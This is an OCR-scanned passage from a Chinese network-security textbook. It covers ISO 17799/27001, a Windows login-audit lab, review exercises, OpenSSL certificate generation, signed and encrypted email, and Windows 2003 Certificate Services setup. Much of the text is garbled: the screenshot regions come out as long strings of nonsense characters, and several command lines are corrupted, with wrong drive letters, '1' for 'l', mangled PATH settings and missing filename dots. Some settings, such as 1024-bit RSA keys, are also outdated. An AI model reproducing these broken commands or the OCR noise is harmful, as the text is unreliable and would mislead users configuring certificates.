实施 规范 、 人 员 培 训 教 育 及 录用 要 求 、 信 息 安全 社会 化 服务 管理 规范 、 信 息 安 全 保险 业务 
规范 框架 和 安全 策略 要 求 与 指南 。 目 前 ，WG7 工作 组 正在 着 手 制定 推荐 性 国家 标准 《信息 
技术 信息 安全 管理 实用 规则 》， 该 标准 的 采用 程度 为 等 同 采 用 标准 ， 也 就 是 说 该 标准 与 
ISO/EC 17799 相同 ， 除 了 纠正 排版 或 印刷 错误 、 改 变 标点 符号 、 增 加 不 改变 技术 内 容 的 
说 明和 指示 之 外 ， 不 改变 标准 技术 的 内 容 。 

虽然 我 国信 息 安 全 标准 委员 会 不 是 将 ISO/IEC 17799 和 ISOTEC 27001 作为 强制 性 国 
家 标准 引入 ， 而 是 仅 作为 推荐 性 国家 标准 推行 ， 但 是 企业 和 组 织 仍然 可 以 将 ISO/IEC 
17799 和 ISOTEC 27001 作为 衡量 信息 安全 管理 体系 规范 程度 的 一 个 标准 和 指标 。 建 立信 
息 安 全 管理 体系 并 获得 认证 机 构 的 认证 ， 不 仅 能 提高 组 织 自身 的 安全 管理 水 平 ， 将 企业 的 
安全 风险 控制 在 可 接受 的 程度 ， 保 证 业务 的 可 持续 运作 ， 减 小 信息 安全 遭 到 破坏 带 来 的 损 
失 ; 并 且 能 向 利益 相关 方 展示 组 织 对 信息 安全 的 承诺 ， 向 政府 及 行业 主管 部 门 证 明 组 织 对 
相关 法 律 法 规 的 符合 ， 并 且 得 到 国际 上 的 承认 。 尤 其 对 于 银行 、 证 券 、 电 子 商 务 、ISP 等 
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PY @ 1 信和 人 用 


服务 提供 商 来 说 ， 可 以 借 此 向 客户 展示 其 服务 相 比 其 他 竞争 对 手 更 加 安全 、 可 靠 ， 并 树立 
和 增强 企业 的 信息 安全 形象 ， 提 高 企业 的 综合 竞争 力 。 


9.8 ”小 型 案例 实 训 


为 了 保证 系统 正常 运行 、 准 确 解决 遇 到 的 各 种 各 样 的 系统 问题 ， 认 真 地 分 析 日 志文 件 
和 进行 安全 审核 是 系统 管理 员 的 一 项 非常 重要 的 任务 。 通 过 实时 的 、 集 中 的 、 可 视 化 的 审 
核 ， 能 有 效 地 评估 系统 的 安全 ， 并 及 时 发 现 安全 隐患 。 本 实验 将 在 Windows 环境 下 对 系统 
登录 事件 进行 审核 ， 增 强 学 生 安全 防护 知识 。 

1) “设置 账户 审核 策略 

(1) 使 用 管理 员 身 份 登录 系统 。 

(2) 打开 系统 管理 工具 中 的 “本 地 安全 设置 ”窗口 。 

(3) 进入 “本 地 策略 ”一 “审核 策略 ”节点 ， 并 进行 如 表 9-1 所 示 的 设置 ， 设 置 后 的 




















参数 如 图 9-2 所 示 。 
表 9-1 账户 审核 策略 设置 
策 略 本 地 设置 
审核 账户 登录 事件 成 功 ， 失 败 
审核 账户 管理 成 功 ， 失 败 
审核 登录 事件 成 功 ， 失 败 
审核 策略 更 改 成 功 ， 失 败 
审核 特权 使 用 失败 
审核 系统 事件 失败 
至 来 天 安全 设置 忆 吕 男 
文件 人 @) 操作 (和 ) ee 帮助 (6) 
++ 条 x 局 全 
Ei 营 握 
罚 天 指派 陵 
全 主 生 人 核 
名 策略 





全 训 和 中 
户 普 录 事 件 
最 人 P 安全 策略 ,在 本 地 计算 机 ED 


如 如 六 六 Ht 
时 导 深 深 于 到 到 
省 站 
加 容 























图 9-2 本 地 安全 设置 
2) 查看 “安全 性 ”日 志 
(1) 设置 好 后 ， 退 出 系统 ， 并 以 管理 员 身 份 使 用 错误 的 口令 进行 失败 登录 的 尝试 。 
(2) 以 管理 员 身 份 并 使 用 正确 的 口令 登录 系统 。 
(3) 打开 事件 查看 器 。 
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(4) 查看 “安全 性 ”日 志 ， 找 出 登录 失败 的 日 志 记 录 ， 如 图 9-3 所 示 ， 其 中 的 事件 号 
对 应 的 描述 如 表 9-2 所 示 。 
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6005 
6006 
6007 
6008 
6009 
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昌吉 537 从 
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图 9-3 查看 “安全 性 ”日 志 
表 9-2 Windows 2000 系统 中 的 重要 事件 


描述 
登录 失败 的 事件 编号 (在 安全 日 志 中 ) 
Windows 2000 重新 启动 的 事件 编号 (在 系统 日 志 中 ) 
系统 正常 关机 的 事件 编号 (在 系统 日 志 中 ) 
因为 权限 不 够 而 导致 非 正 常 关机 的 请 求 (在 系统 日 志 中 ) 
“ 非 正常 关机 ”事件 ， 当 Windows 系统 被 非法 关机 时 ， 该 操作 被 记录 下 来 。 
记录 工作 系统 的 版 本 号 、 修 建 号 、 补 丁 号 和 系统 处 理 器 的 相关 信息 (在 系统 日 志 中 ) 


3) 查看 “系统 ”日 志 

(1) 注销 后 ， 重 新 使 用 管理 员 账 号 登录 ， 并 查看 “事件 查看 器 ”。 

(2) 清除 “安全 性 ”和 “系统 ”日 志 。 

(3) 重新 启动 Windows 2003 系统 ， 并 以 管理 员 身 份 登录 。 

(4) 打开 “事件 查看 器 ”， 查 看 “系统 ”日 志 记录 的 信息 ， 如 图 9-4 所 示 。 
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2008-413 无 6005 NA 
2008-4-13 无 6009 NA 
2008-413 无 6006 NA 
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图 9-4 查看 “系统 ”日 志 
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(5) 强制 关闭 (直接 关闭 电源 )Windows 2003 系统 ， 系 统 会 产生 一 个 非法 关机 的 日 志 记录 。 
(6) 重新 登录 系统 ， 并 在 “事件 查看 器 ”的 系统 日 志 里 找到 事件 ID 号 为 6008 的 事件 
日 志 ， 如 图 9-5 所 示 。 
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9-5 ”查看 事件 ID 号 为 6008 的 事件 日 志 


本 章 小 结 


网 络 安全 管理 是 网 络 安全 保障 体系 建设 的 重要 组 成 部 分 ， 对 于 保护 网 络 资源 、 降 低 网 
络 系统 安全 风险 、 指 导 网 络 安全 体系 建设 具有 重要 作用 ， 是 组 织 中 用 于 指导 和 管理 各 种 控 
制 网 络 安全 风险 、 相 互 协调 的 活动 。 有 效 的 网 络 安全 管理 要 尽量 做 到 在 有 限 的 成 本 下 ， 保 
证 系统 中 的 信息 网 络 安全 。 


习 是 


一 、 选 择 题 


下 
出 将 信息 系统 的 安全 等 级 划分 为 ( 


> 
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1999 年 ， 我 国 发 布 的 第 一 个 信息 安全 等 级 保护 的 国家 标准 GB 17859 一 1999， 提 
) 个 等 级 ， 并 提出 每 个 级 别 的 安全 功能 要 求 。 


pL DB C6 Di:3 

等 级 保护 标准 GB 17859 主要 是 参考 了 ( ”) 而 提出 。 

A. 欧洲 ITSEC B. 美国 TCSEC 

Ce D. BS 7799 

我 国 在 1999 年 发 布 的 国家 标准 ( 。 ”) 为 信息 安全 等 级 保护 英 定 了 基础 。 
A. GB 177998  B. GB 15408 C. GB 17859 D. GB 14430 
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4. ”信息 安全 等 级 保护 的 5 个 级 别 中 ,，( ”) 是 最 高 级 别 ， 属 于 关系 到 国计民生 的 最 
关键 信息 系统 的 保护 。 
A. 强制 保护 级 ”B. 专 控 保 护 级 ”C. 监督 保护 级 
D. 指导 保护 级 下. 自主 保护 级 
5. 《信息 系统 安全 等 级 保护 实施 指南 》 将 ( 。”) 作 为 实施 等 级 保护 的 第 一 项 重要 内 容 。 
A. 安全 定 级 B. 安全 评估 C. 安全 规划 D. 安全 实施 
6.( ， ) 是 进行 等 级 确定 和 等 级 保护 管理 的 最 终 对 象 。 
A. 业务 系统 B. 功能 模块 C. 信息 系统 D. 网 络 系统 
7. 当 信 息 系统 中 包含 多 个 业务 子 系统 时 ， 对 每 个 业务 子 系统 进行 安全 等 级 确定 ， 最 
终 信 息 系统 的 安全 等 级 应 当 由 (  ) 所 确定 。 
A. 业务 子 系统 的 安全 等 级 平均 值 ”B. 业务 子 系统 的 最 高 安全 等 级 
C. 业务 子 系统 的 最 低 安 全 等 级 D. 以 上 说 法 都 错误 
二 、 简 答题 
1. 简 述 安全 策略 体系 所 包含 的 内 容 。 
2. 简 述 我 国信 息 安全 等 级 保护 的 级 别 划 分 。 
3. 简 述 至 少 4 种 信息 系统 所 面临 的 安全 威胁 。 
4. 简 述 信息 安全 脆弱 性 的 分 类 及 其 内 容 。 
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项 目 实 践 


IN 全 计算 机 网 络 安全 教程 


实 训 是 高 等 职业 教育 非常 重要 的 一 个 教学 环节 。 开 设 本 章 项 目 实践 主要 是 为 配合 前 面 
讲述 的 计算 机 网 络 安全 的 相关 理论 和 实践 知识 ， 以 此 为 基础 进行 一 个 综合 的 技能 训练 。 

本 章 设 计 了 5 个 项 目 实 训 案例 ， 案 例 包括 实 训 目的 、 实 训 环境 、 实 训 内 容 和 步骤 3 
部 分 内 容 。 

本 章 实 训 的 主要 目的 如 下 。 

(1) 在 实践 过 程 中 ， 使 学 生 进 一 步 巩固 计算 机 网 络 安 全 教程 所 学 知识 ， 更 加 深入 地 了 
解 网 络 安全 威胁 、 黑 客 技术 以 及 网 络 安全 技术 的 实施 、 网 络 安全 维护 等 。 

(2) 按照 网 络 安全 的 相关 要 求 引导 学 生 完成 实 训 课题 ， 以 便 学 生 了 解 网 络 安全 管理 与 
维护 的 几 个 重要 环节 。 

(3) 指导 学 生 利用 获取 信息 的 手段 进一步 获取 新 知识 ， 以 解决 实 训 过 程 中 遇 到 的 技术 
难点 ， 从 而 提高 学 生 的 自学 能 力 。 

(4) 提高 学 生 的 实际 动手 能 力 ， 培 养 学 生 分 工 协 作 的 团队 精神 。 


实 训 1 数字 证 书 与 数字 签名 
任务 1.1 使 用 OPENSSL 生成 证 书 











1. 实 训 目的 


(1) 了 解数 字 证 书 的 结构 、 公 和 钥 密 码 体制 的 原理 。 
(2) 了 解数 字 证 书 的 申请 、 生 成 、 签 署 、 颁 发 的 过 程 。 
(3) 掌握 数字 证 书 正 、OE 的 衔接 过 程 。 


2. 实 训 环境 


(1) 个 人 计算 机 中 预 装 Windows 7 或 Windows XP 操作 系统 和 浏览 器 。 
(2) OPENSSL 软件 包 。 


3. 实 训 内 容 和 步骤 
【准备 工作 】 


(1) 下 载 OPENSSL 安装 包 。 

(2) 解压 缩 安装 包 在 C 盘 根 目录 下 ， 自 动 生成 OPENSSL 文件 夹 。 

(3) 选择 “开始 ”一 “程序 ”一 “附件 ”一 “命令 提示 符 ” 菜 单 命令 ， 打 开 “ 命 令 提 
示 符 ”窗口 ， 如 图 10-1 所 示 。 





图 10-1 打开 “命令 提示 符 ” 窗 口 
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(4) 输入 cd ci\openssl\out32dll， 按 Enter 键 ， 进 入 到 openssl\out32dll 目录 下 ， 如 图 10-2 


所 示 。 
(5) 创建 一 个 用 于 存放 证 书 的 文件 夹 。 命 令 为 md mycrt， 输 入 后 按 Enter 键 ， 出 现 如 


图 10-3 所 示 的 页 面 。 

















lout32d11 





图 10-2 进入 目录 


人 ES 


ETTTTTETTT EECIT7T] 
kc》 版 19 BO1 Microsoft Corp. 


:\Docunents and Settings new)cd c:\openssl\out32d11 


I 


l\out32d11>, 





图 10-3 创建 存放 证 书 的 路 径 
(6) 进入 mycrt 文件 夹 ， 命 令 为 cd mycrt， 如 图 10-4 所 示 。 


sl1out32dl11>md mycrt 


32d11)cd mycrt 


wut32dll\nycrt 





10-4 ”进入 证 书 路 径 


(7) 把 4 个 文件 复制 到 当前 文件 夹 : Openssl.cnf，index.txt，index.txt.attr，serial。 

输入 命令 copy ci\openssl\openssl.cnf c:\opensslvout32dllmycrt ， 按 Enter 键 后 ， 
openssl.cnf 文件 拷贝 完成 ， 如 图 10-5 所 示 。 按 同样 方法 ， 把 其 他 3 个 文件 复制 到 当前 文件 
夹 ， 命 令 如 下 ( 见 图 10-6): 

copy c:\openssl\apps\demoCA\index.txt c: \openssl\out32dll\mycrt 

copy c: \openssl\apps\demoCA\index.txt.attr c:\openssl\out32dll\mycrt 

copy c:\openssl\apps\demoCA\serial c: \openssl\out32dll\mycrt 
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图 10-6 复制 相关 文件 


(8) 查看 是 否 把 4 个 文件 复制 到 mycrt 文件 夹 ， 命 令 为 dir， 如 图 10-7 所 示 ， 文 件 已 经 
复制 完成 。 


C:\VINDOWS\systen32\cad. exe 


2984-19-19 
pee4-19-18 


919.464 








图 10-7 查看 目录 
【 实 训 内 容 和 步骤 】 


1) 为 CA 创建 一 个 RSA 私 钥 
命令 如 下 : 
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set path=c:\openss1\out32d117;$pathsg7 
openssl genrsa -des3 -out ca.key 1024， 


如 图 10-8 所 示 ， 生 成 一 个 存放 私 钥 密码 的 ca.key 文件 ( 需 输 入 原先 设 定 的 保护 密码 )。 


< 命令 更 示 符 ~- openssl genrsa -des3 -out ca.key 1024 





图 10-8 生产 私 钥 


2) 用 CA 的 RSA 私 钥 创 建 一 个 自 签 名 的 CA 根 证 书 

创建 一 个 自 签名 的 根 证 书 ， 运 行 req 命令 ， 生 成 一 个 cacert.crt 文件 ， 命 令 为 openssl 
req -new -x509 -days 3650 -key ca.key -out cacert.crt -config openssl.cnf。 输 入 命令 后 ， 提 示 
输入 国家 代号 、 省 份 名 称 、 城 市 名 称 、 公 司 名 称 、 部 门 名 称 、 你 的 姓名 及 Email 地 址 ， 生 
成 的 根 证 书 的 名 字 为 cacert.crt， 如 图 10-9 所 示 。 
































图 10-9 创建 根 证 书 
3) 为 用 户 ( 服 务 器 、 个 人 ) 颁 发 证 书 
为 用 户 颁 发 证 书 ， 先 用 genrsa 命令 为 用 户 生 成 私 铀 ， 再 用 req 命令 生成 证 书签 署 请 求 














CSR， 然 后 再 用 x509 生成 证 书 。 
输入 openssl genrsa -des3 -out 026h23fkey 1024 命令 ， 结 果 如 图 10-10 所 示 ( 设 定 用 户 私 
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钥 的 保护 密码 )。 

输入 openssl req -new -key 026h23fkey -out 026h23f.csr -config openssl.cnf 命令 ,结果 如 
图 10-11 所 示 。 

输入 openssl x509 -req -in 026h23fcsr -out 026h23f.crt -CA cacert.crt -CAkey ca.key -days 
600 命令 ， 出 现 如 图 10-12 所 示 页 面 ， 要 求 输入 CA 的 RSA 私 钥 的 保护 密码 。 

执行 上 面 的 命令 时 要 按 提示 输入 一 些 个 人 信息 ， 最 后 生成 客户 证 书 026h23f crt。 








10-10 ”生成 客户 证 书 命令 10-11 生成 客户 证 书 





图 10-12 ”生成 客户 证 书 结果 
4) 将 生成 的 证 书 再 进一步 转换 为 个 人 私 钥 证 书 








可 进一步 使 用 pkcs12 命令 openssl pkcsl2 -export -clcerts -in 026h23fcrt -inkey 
026h23fkey -out 026h23fp10， 这 样 将 会 得 到 一 个 含有 私 钥 的 证 书 026h23fp12。 

5) 证 书 的 使 用 

在 正 浏 览 器 中 ， 选 择 “ 工 具 ” 一 “Interet 选项 ”菜单 命令 ,在 “Internet 选项 ” 窗 
中 选择 “内 容 ” 选 项 卡 来 导入 上 面 产生 的 证 书 ， 如 图 10-13 所 示 ; 在 Outlook Express 中 ， 
也 可 以 选择 “工具 ”一 “选项 ”菜单 命令 ， 在 “选项 ”窗口 中 选择 “安全 ”选项 卡 来 导入 
数字 证 书 ， 这 样 就 可 以 对 发 送 的 邮件 进行 签名 和 解密 了 。 
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常规 | 安全 ”内容 | 连接 | 程序 | 高 级 | 








三 分 痰 审查 
可 介绍 系统 可 帮助 你 控制 在 该 计算 机 上 看 到 的 Internet 内 容 。 


局 用 四 2 








[人 使 用 证 书 可 正确 标识 您 自己 从 
国 发 证 机 构 和 发 行商 的 身份 。 





个 人 信息 





a Re sy. 


入: 文件 助 家村 作 的 。。 本 轩 六， 

















10-13 “Internet 选项 ”窗口 


任务 1.2 用 CA 证书 签名、 加 密 及 发 送 安全 电子 邮件 


(1) 个 人 计算 机 中 预 装 Windows 7 或 Windows XP 操作 系统 。 
(2) 操作 系统 预 装 浏览 器 和 Outlook Express 软件 。 


3. 实 训 内 容 和 步骤 


1) “安全 电子 邮件 证 书 的 申请 

使 用 数字 证 书 来 签名 、 加 密 ， 则 必须 先 申请 一 张 数字 证 书 。 现 在 发 数字 证 书 的 机 构 很 
多 ， 国 内 各 省 也 在 建立 自己 的 CA 中 心 ， 并且 有 些 机 构 提 供 免费 的 数字 证 书 ， 如 MyCA 
(https://www.myca.cn)。 

申请 使 用 安全 电子 邮件 证 书 首先 需要 确认 你 使 用 的 是 POP3 收 件 方式 ， 因 为 现 有 的 数 
字 证 书 不 支持 Web 收 件 方式 。 

(1) 登录 网 站 http://www.myca.cn/myca/， 如 图 10-14 所 示 。 

(2) 安装 CA 证 书 。 单 击 右 侧 “ 安 装 根 证 书 ” 链 接 ， 出 现 如 图 10-15 所 示 的 提示 ， 单 击 
“是 ”按钮 ， 开 始 安 装 根 证 书 。 根 证 书 是 所 信任 机 构 的 证 书 ， 在 这 里 就 是 MYCA 的 证 书 。 


第 10 章 项目 实 路 又 A 有 


由 于 越 来 越 多 的 人 通过 电子 邮件 进行 重要 的 商务 活动 和 发 送 机 密 信息 ， 而 且 随 着 互联 
网 的 飞速 发 展 ， 这 类 应 用 会 更 加 频繁 。 因 此 保证 邮件 的 真实 性 ( 即 不 被 他 人 伪造 ) 以 及 不 被 
其 他 人 截取 和 偷 阅 也 变 得 日 益 重 要 。 因 为 许多 黑客 软件 能 够 很 容易 地 发 送 假 地 址 邮件 和 匿 
名 邮件 ， 即 使 是 正确 地 址 发 来 的 邮件 在 传递 途中 也 很 容易 被 他 人 截取 并 阅读 ， 这 对 于 重要 
信件 来 说 是 难以 容忍 的 。 本 任务 以 Outlook Express 为 例 介 绍 发 送 安全 邮件 和 加 密 邮 件 的 具 
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ED 了 yCA 数 字 证 ft Internet Erplorer 





文件 四 ”编辑 时) 查看 WD 收藏 风 工具 GD) 帮助 如 


四 恨 - 加 -四国 的 月 县 责 tmx 加 它 - 生 回 - 和 


地 址 @) = | 二 https: /ww nyes cymycwindex asp , 未 辣 贺 9 到 语 插 ”” 
YaHoOlI- ~Qm- mR 加 上 Rm- i 国 修 复 四 杀毒 » 呈 - 
PE 一 一 











人 有 rc 
加 时 你 还 没 实物 By 要 证 书 ， 语 先 安 半 要 下 

注册 节 ， 以 保证 正 守 的 便 用 yc 服务 - 
OO 选择 此 选项 可 以 为 用 户 注册 一 个 数字 证 书 。 Ltn te 
册 中 请 一 张 专属 于 修 的 CA 下 节 ，Ibc 提 供 的 锡 费 CA 
@ 证 书 证 书 可 以 用 于 客户 端 验 证 、 安 全 电子 凶 件 ,并 且 没 
如 果 您 已 经 注册 了 数字 证 书 ， 但 是 还 没有 获取 ， 请 选择 该 寺 项 。 有 使 用 时 间 的 限制 。 加 你 要 申请 用 于 其 地 用 才 的 CA 

证 节 ， 请 联系 CA Ginfoanyea cn) 


@ 走 找 选择 此 选项 可 以 查找 一 个 数 宇 证 书 ， 这 项 功能 有 助 于 确定 - 有 关 使 用 申请 、 使 用 数字 证 书 的 问题 请 进 论坛 
上 过 期 惑 已经 被 吊销 。 和 


加 咒 

选择 这 个 造 天 可 以 品 销 候 的 数字 证 书 。 如 果 怀疑 效 字 证 书 受到 乞 Ch 服务- 
韦 ， 则 应 立即 将 它 吊销 。 这 些 危害 包括 私 机 于 失 下 被 次 、 密 钼 对 匀 我 不 保证 也 不 矣 CA 下 节 持 者 的 真实 和 
囊 坏 、 所 有 权 变 更， 以 及 可 经 的 炊 骗 行 为 。 





Er A 数字 证 书 中 心 ~ Nicrosoft Internet Rxplorer 





OE © 国 国 必 |[ 忆 央 页 呈 | 妆 加 ~ oS 


地 址 和 @@) 。 | 加 https: /wm nyen ceyewinstallReot asp 起 拉 W 生 辣 圆 交 到 谨 扩 >” 
YaHoo!- 有] 扫兴 加 上 Rb 手 - 田 杀毒 w | 而 





















乔 正在 打开 网 页 https;//wrw. myca en/myca/installRoot. asp. 


图 10-15 安装 CA 证 书 
(3) 在 注册 页 面 中 按 规定 要 求 填写 注册 信息 ， 如 图 10-16 所 示 。 
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ED A - 了 ic 
文件 上 名 加 如 ”查看 中 


Fe- 自 国 国 的 有 时 去 x @ 伯 :学 回 -加 久久 0 了 名 

















地 址 @) ~ CE err nye evnyes/oserEnr els amp 所 区 入 中立， 下 持 控 地 图 | 图 和 到 话语 ** 
YaHoo!- MA 二 上 有 MF 清香 四 修复 四 杀毒 ”是 - 
注册 WtyCA 


基本 信息 加 果 阁 还 没 安装 HyCA8 的 要 证书， 请 先 安装 根 证 
ee 并 向 公众 公开 。 有 “#” 标记 的 字 书 ， 以 保证 奖 正 党 的 使 用 lyCA 的 服务 。 











10-16 证 书 申请 


(4) 完成 后 提交 。 确 认 填 写 的 电子 邮件 信息 正确 ， 确 认 后 单 击 “确定 ”按钮 。 弹 出 
“潜在 的 脚步 冲突 ”窗口 ， 单 击 “ 是 ”按钮 完成 数字 证 书 的 申请 。 

(5) 收 到 管理 员 发 来 的 电子 邮件 ， 按 邮件 提示 步骤 取 回 数字 证 书 ， 如 图 10-17 所 示 。 
即 输入 个 人 身份 号 (管理 员 电 子 邮件 中 发 来 的 号 码 )， 完 成 安装 。 














罚 EyCA 数 字 证 书 中 心 - icrosoft Internet Explorer 画 下 加 

文件 六 得 吕 查看 WD 收藏) 工具 中 必 助 0 四 

@ 旨 - 目 国 国 的 有 户 时 让 Wex 加 全 -学 回 - A 

地 址 @) ”| 三 https://wm myea en/fnyca/nspickup. sp vw >” 

YaHoo!- ”用 搜 尿 团 上 鬼王 ~ 本 固 修复 图 头 毒 ”和 
获取 证 书 


重要 提示 : 这 一 步 必须 用 与 注册 时 相同 的 计算 机 来 完成 。 
身份 识别 码 (PIN) fr 在 提交 注册 胡 后 ， 管 理 员 会 验证 你 的 身份 ， 并 决定 是 否 给 你 颁发 数字 证 书 。 

， 系统 将 为 你 产生 数字 证 书 ， 并 给 你 发 送 一 封 名 为 "你 的 数字 证 书 已 经 逐 淮 备 好 了 “的 电子 邮件 ， ER 
Be (PIN 。 


从 电子 邮件 中 复制 PIN， 粘 贴 到 下 面 的 文本 框 中 ， 然 后 点 击 " 提 交 " 按钮。 


提交 后 ， 在 得 到 响应 之 前 ， 不 要 中 断 你 的 浏览 器 。 











图 10-17 ”获取 证 书 
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2) ”在 Outlook Express 中 使 用 数字 证 书 

(1) 在 Outlook Express 里 选择 “工具 ”一 “账户 ”菜单 命令 。 

(2) 选择 申请 证 书 的 邮件 账号 ， 单 击 “ 属 性 ”按钮 ， 在 打开 的 窗口 中 选中 “安全 ” 选 
项 卡 ， 如 图 10-18 所 示 。 





10-18 账户 属性 


(3) 在 “安全 ”选项 卡 里 选择 相应 的 签名 和 加 密 证 书 。 
(4) 写 好 邮件 后 ， 在 上 方 的 工具 栏 中 单 击 “ 签 名 ”“ 加 密 ” 按 钮 ， 以 实现 相应 的 功 
能 ， 如 图 10-19 所 示 。 





this is a test| 


10-19 发送 签名 邮件 


/2A. 
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逮 注意 :， 电子 邮件 的 加 密 前 提 是 必须 要 收 件 人 和 发 件 人 都 有 数字 证 书 。 如 果 发 件 人 想 
要 给 指定 的 收 件 人 发 送 加 密 邮 件 ， 那 么 必须 有 这 个 指定 的 收 件 人 发 送 的 签名 
邮件 。 如 果 使 用 Outlook Express 或 者 Outlook 接收 邮件 ， 在 收 件 箱 中 选 定 邮 
件 并 单 击 右键 ， 选 择 “ 将 发 件 人 添加 到 通讯 簿 ”菜单 命令 ， 则 系统 会 自动 将 
收 到 邮件 的 签名 证 书 导入 系统 。 这 样 在 下 一 次 想 要 给 对 方 发 送 加 密 邮 件 的 时 
候 ， 只 需要 单 击 “ 加 密 ” 按 钮 即 可 完成 加 密 过 程 。 
3) ”证 书 的 导出 
有 时 候 需 要 将 证 书 安装 到 其 他 的 计算 机 系统 中 ， 那 么 首先 要 导出 证 书 。 
(1) 打开 正 窗口 ， 选 择 “ 工 具 ” 一 “Internet 选项 ”菜单 命令 ,选择 “内 容 ”， 单 击 
(2) 选择 你 需要 备份 的 证 书 ， 单 击 “ 导 出 ”按钮 。 
(3) 进入 证 书 导 出 界面 ， 单 击 “ 下 一 步 ”按钮 。 
(4) 选择 导出 私 钥 。 
(5) 选择 导出 文件 的 格式 。 这 里 要 注意 的 是 一 定 要 选中 “如 果 可 能 ， 将 所 有 证 书包 括 
到 证 书 路 径 中 ”选项 ， 如 图 10-20 所 示 。 





| 
10-20 ”导出 证 书 


(6) 设置 私 钥 保护 密码 。 这 个 密码 将 会 在 导入 的 时 候 用 到 可 不 要 把 密码 忘记 了 。 

(7) 指定 导出 文件 的 存放 路 径 ， 单 击 “ 下 一 步 ” 按 钮 。 建 议 将 私 钥 备份 到 可 移动 的 存 
储 设 备 中 ， 如 软盘 或 光盘 等 。 

(8) 单 击 “ 完 成 ”按钮 。 


| 刚 说 明 :， 恢复 你 的 证 书 (证 书 导入 ) 和 证 书 导 出 的 操作 类 似 ， 按 照 向 导 提 示 操作 即 可 将 
证 书 导 入 到 系统 中 。 
目前 支持 数字 签名 的 电子 邮件 软件 主要 有 Outlook 2000/XP 、Outlook 
Express、 Foxmail、 Notes、 Netscape Messenger、 Frontier、 Pre-mail、 
Eudora 等 。 
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实 训 2 ”Windows 2003 PKI 应 用 实例 
任务 2.1 安装 证 书 服务 器 


1. 实 训 目的 

学 习 如 何 安装 Windows 2003 的 Certificate Services( 数 字 证 书 ) 及 如 何 配 置 企业 根 
证 书 。 

2. 实 训 环境 

一 台 预 装 Windows 2003 服务 器 版 的 计算 机 及 一 台 计 算 机 (可 以 是 Windows XP 或 其 他 
系统 )， 通 过 网 络 相 连 。 也 可 用 虚拟 机 组 建 实验 环境 。 


3. 实 训 内 容 和 步骤 


(1) 选择 “开始 ”一 “设置 ”一 “控制 面板 ”菜单 命令 ， 在 打开 的 窗口 中 双击 “添加 
或 删除 程序 ”选项 ， 再 单 击 “ 添 加 /删除 Windows 组 件 ” 按 钮 ， 如 图 10-21 所 示 。 





E> 
添加 新 程序 





入 Livelpdate 1.6 (Symantec Corporation) 大 小 2.84NMB 
a 包 Serverllagic 4.0 大 小 30. OMB 
稳 snort 大 小 STBKB 
CB Smantec pcAnywhere 大 小 42. 6MB 
图 wware Tools 大 小 6. 15MB 
更 Windows 2000 Support Tools 大 小 19. 1WB 
旭 Yinkex 大 小 1. 89MB 
四 Wispesp 3.0 大 小 396KB 
性 WinRAR 压缩 文件 管理 器 大 小 2. G9MB 
时 
关闭 @) 


图 10-21 添加 组 件 


(2) 在 打开 的 对 话 框 中 选中 “证 书 服务 ” 复 选 框 ， 单 击 “ 下 一 步 ” 按 钮 ， 弹 出 一 个 对 
话 框 ， 单 击 “ 是 ”按钮 就 可 以 了 ， 如 图 10-22 所 示 。 

(3) 选择 CA 类 型 ， 这 里 选择 “企业 根 CA”， 单 击 “ 下 一 步 ”按钮 ， 如 图 10-23 
所 示 。 

(4) 为 此 CA 取 一 个 公用 的 名 称 ， 如 图 10-24 所 示 。 
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_ 





Tindors 钥 件 
可 以 添加 或 删除 Yindows 2000 的 组 件 。 











图 10-24 填写 CA 信息 
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所 示 。 








10-25 选择 CA 存放 路 径 


(6) 弹出 一 个 对 话 框 ， 提 示 为 了 完成 安装 ， 必 须 暂 时 停止 IS 服务 ， 单 击 “ 确 定 ” 按 
钮 即 可 。 如 图 10-26 所 示 。 


: \WINNT\System32\CertLog | 








10-26 停止 IIS 服务 


(7) 显示 安装 进度 条 ， 如 图 10-27 所 示 。 

(8) 安装 完成 ， 单 击 “ 完 成 ”按钮 即 可 ， 如 图 10-28 所 示 。 

(9) 选择 “开始 ”一 “程序 ”一 “管理 工具 ”一 “证 书 颁发 机 构 ” 菜 单 命令 ， 进 入 证 
书 服务 控制 台 ， 如 图 10-29 所 示 。 


/za. 


Windows 钥 件 向 导 


正在 配置 组 件 
安装 程序 正在 根据 您 的 请 求 ， 进 行 配置 更 疏 。 


完成 “Windows 组 件 向 导 ” 


您 已 成 功 地 完成 了 “Windows 组件 向 导 ”。 


请 单 击 “完成 ”来 关闭 此 向 导 。 





图 10-28 ”安装 完成 





图 10-29 进入 证 书 服务 


(a8. 


Ye 计算 机 网 络 安全 教程 
(10) 在 证 书 服务 控制 台 里 可 以 查看 已 颁发 的 证 书 、 失 效 的 证 书 、 挂 起 或 吊销 证 书 的 状 


态 以 及 添加 证 书 模板 。 
任务 2.2 ”安装 客户 端 证 书 
1. 实 训 目 的 
学 习 如 何 申请 一 个 客户 端 证 书 ， 以 及 客户 端 证 书 的 安装 。 
2. 实 训 环境 


一 台 预 装 Windows 2003 服务 器 版 的 计算 机 及 一 台 计算 机 (可 以 是 Windows XP 或 其 他 
系统 )， 通 过 网 络 相连 。 也 可 用 虚拟 机 组 建 实验 环境 。 


3. 实 训 内 容 和 步骤 


(1) 现在 “证 书 服务 ”就 可 以 为 用 户 提供 服务 了 ， 用 Bob 这 个 账号 在 一 个 客户 端 上 登 
录 ， 本 例 为 Windows XP 系统 。 打 开 正 浏览 器 ， 在 地 址 栏 里 输入 “http:// 证 书 服务 器 的 人 P 
地 址 /certsrv”， 这 里 证 书 服务 器 的 人 P 地 址 为 192.168.13.200。 弹 出 一 个 登录 对 话 框 ， 输 入 
Bob 的 用 户 名 与 密码 后 ， 按 Enter 键 ， 如 图 10-30 所 示 。 

(2) 选中 “申请 证 书 ” 单 选 按钮 ， 如 图 10-31 所 示 。 






Be- 昌国 四 的 用 半 克 mx @| 合 - 怠 回 :国航 ” 


缮 柱 0 | 阐 http://192 168_13.200/certsrv/ On Hi” Gsm 国人- 








您 使 用 此 Web 站 点 为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 ， 或 其 它 安 全 程序 申请 一 
个 证 书 。 一 . 得 一 个 证 书 ， 您 将 能 够 安全 地 向 Web 由 岂可 你 自己 ， 
i 加 密 电子 邮件 ， 以 及 其 它 ， 基 于 您 申请 的 证 书 类 型 



































选择 一 个 任务 : 
〇 检索 CA 证 书 或 证 书 吊销 列表 
加 申请 证 书 
正在 连接 到 192. 168. 13. 200 加 检查 挂 起 的 证 书 
用 FU: [|@ winiseror 加 
密码 四 ): FE 和 | 
口 记 人 我 的 密码 @) 
确定 ] [ 取消 
司 国 Internet 
